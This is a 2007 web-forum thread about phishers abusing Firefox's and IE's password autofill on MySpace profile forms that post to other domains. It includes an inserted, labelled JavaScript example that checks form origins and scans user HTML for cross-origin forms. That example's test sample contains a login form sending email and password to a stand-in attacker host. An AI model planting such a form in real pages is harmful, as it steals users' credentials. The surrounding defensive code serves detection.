Potential Firefox password manager vulnerability
Posted: Wed Jan 31, 2007 5:16 pm
by RobertGonzalez
A colleague of mine just sent me this article. This is surprising and frightening at the same time.
http://www.info-svc.com/news/11-21-2006/
Apparently crafty phishers have found a way to tap into the 'Remember my Password for this' feature of Firefox (and from what I was reading, IE6 and IE7 as well) and auto-populate the password field of forms that post to a different domain. This requires some work on the hackers' part, but it works with scary efficiency.
PS
This is the Firefox Bugzilla entry for this known bug.
Posted: Wed Jan 31, 2007 5:36 pm
by superdezign
See, this is why I don't use the password remembrance feature.
Posted: Wed Jan 31, 2007 6:09 pm
by JellyFish
Yeah, but you'd still need to visit the myspace profile and submit your information.
EDIT:
Actually, in the case of using Firefox, you need to fill in the username before the password will auto-fill. You'd need myspace, for example, to auto-fill the username, thus auto-filling the password. As well, you need to click submit and, before anything, visit the myspace profile.
EDIT 2: And from this example:
https://bugzilla.mozilla.org/attachment.cgi?id=245426 I get a warning from Firefox explaining that this information is about to be sent to a third-party server. At least, this is because I have the most recent version of Firefox.
Posted: Thu Feb 01, 2007 1:21 am
by matthijs
There are 2 issues here. First the fact that FF (and IE apparently) fills in a password without checking the action of the form (going to another domain). That should be solved. In my opinion without a popup asking "Are you sure you want to ... ", as that doesn't work anyway and is irritating only.
But the other thing is that allowing users to use HTML and create forms on their pages is silly. Another reason why user-generated HTML is a bad idea.
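The two checks matthijs asks for, as an added example that is not part of the original thread and not Mozilla's or Microsoft's code: first, the test a password manager should run before auto-filling (does the form's submit target share the origin the credentials were saved for?), and second, a scan of user-generated HTML for forms whose action points off-site. The profile URL, the attacker hostname `evil.example.net` and the sample HTML are constructed for illustration; the regex-based scan is a demonstration, and a real filter would use an HTML parser.

```javascript
// Added example (not from the thread, Firefox or IE). Shows the same-origin
// check an autofill feature should make before filling a saved password, and
// a scan for cross-origin <form> elements in user-generated HTML.
// Requires Node.js (uses the global WHATWG URL class). Hostnames are hypothetical.

// Decide whether to auto-fill a saved credential into a form on pageUrl whose
// action attribute is `action`. `savedForOrigin` is the origin the credential
// was stored for (e.g. "https://profile.myspace.com").
function shouldAutofill(pageUrl, action, savedForOrigin) {
  const page = new URL(pageUrl);
  // An empty or missing action submits to the page itself; relative actions
  // resolve against the page URL, exactly as the browser would resolve them.
  const target = new URL(action || "", page);
  // Only fill on the origin the credential belongs to...
  if (page.origin !== savedForOrigin) return false;
  // ...and only when the form would post back to that same origin. This is the
  // check the post above says FF and IE were missing.
  if (target.origin !== page.origin) return false;
  // Never send a saved password over plain HTTP from an HTTPS page.
  if (page.protocol === "https:" && target.protocol !== "https:") return false;
  return true;
}

// Scan user-generated HTML for <form> tags whose action resolves to another
// origin. Returns one record per offending form.
function findCrossOriginForms(pageUrl, html) {
  const page = new URL(pageUrl);
  const results = [];
  const formRe = /<form\b([^>]*)>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = m[1];
    const actionMatch = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    const action = actionMatch
      ? (actionMatch[1] ?? actionMatch[2] ?? actionMatch[3])
      : "";
    let target;
    try {
      target = new URL(action, page);
    } catch (e) {
      results.push({ action, reason: "unparseable" });
      continue;
    }
    if (target.origin !== page.origin) {
      results.push({ action, target: target.origin, reason: "cross-origin" });
    }
  }
  return results;
}

// Constructed sample: a profile page carrying an injected login form that posts
// to a hypothetical attacker host, next to a legitimate same-origin form.
const PROFILE_URL = "https://profile.myspace.com/some_user";
const SAMPLE_HTML = `
<p>Welcome to my page!</p>
<form action="http://evil.example.net/collect" method="post">
  <input name="email"><input name="password" type="password">
  <input type="submit" value="Log in">
</form>
<form action="/search" method="get"><input name="q"></form>
`;

// Stand-alone demonstration.
console.log("autofill injected form:",
  shouldAutofill(PROFILE_URL, "http://evil.example.net/collect", "https://profile.myspace.com"));
console.log("autofill same-origin form:",
  shouldAutofill(PROFILE_URL, "/login", "https://profile.myspace.com"));
console.log("cross-origin forms:", findCrossOriginForms(PROFILE_URL, SAMPLE_HTML));
```

Note that the origin comparison covers scheme, host and port, so a form posting to `http://profile.myspace.com/...` from an `https://` page is also refused; comparing hostnames alone would let an on-path attacker collect the credential in clear text.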
Posted: Thu Feb 01, 2007 1:25 am
by superdezign
Web designers (and hackers) have to start somewhere :-p
But, I mean, FF and IE do give warnings about the feature and its possible security glitches (at least FF did), so saving your password onto your computer is definitely a risk.
Posted: Thu Feb 01, 2007 2:50 am
by AKA Panama Jack
Whispers...
Opera...
Leaves the room quietly...
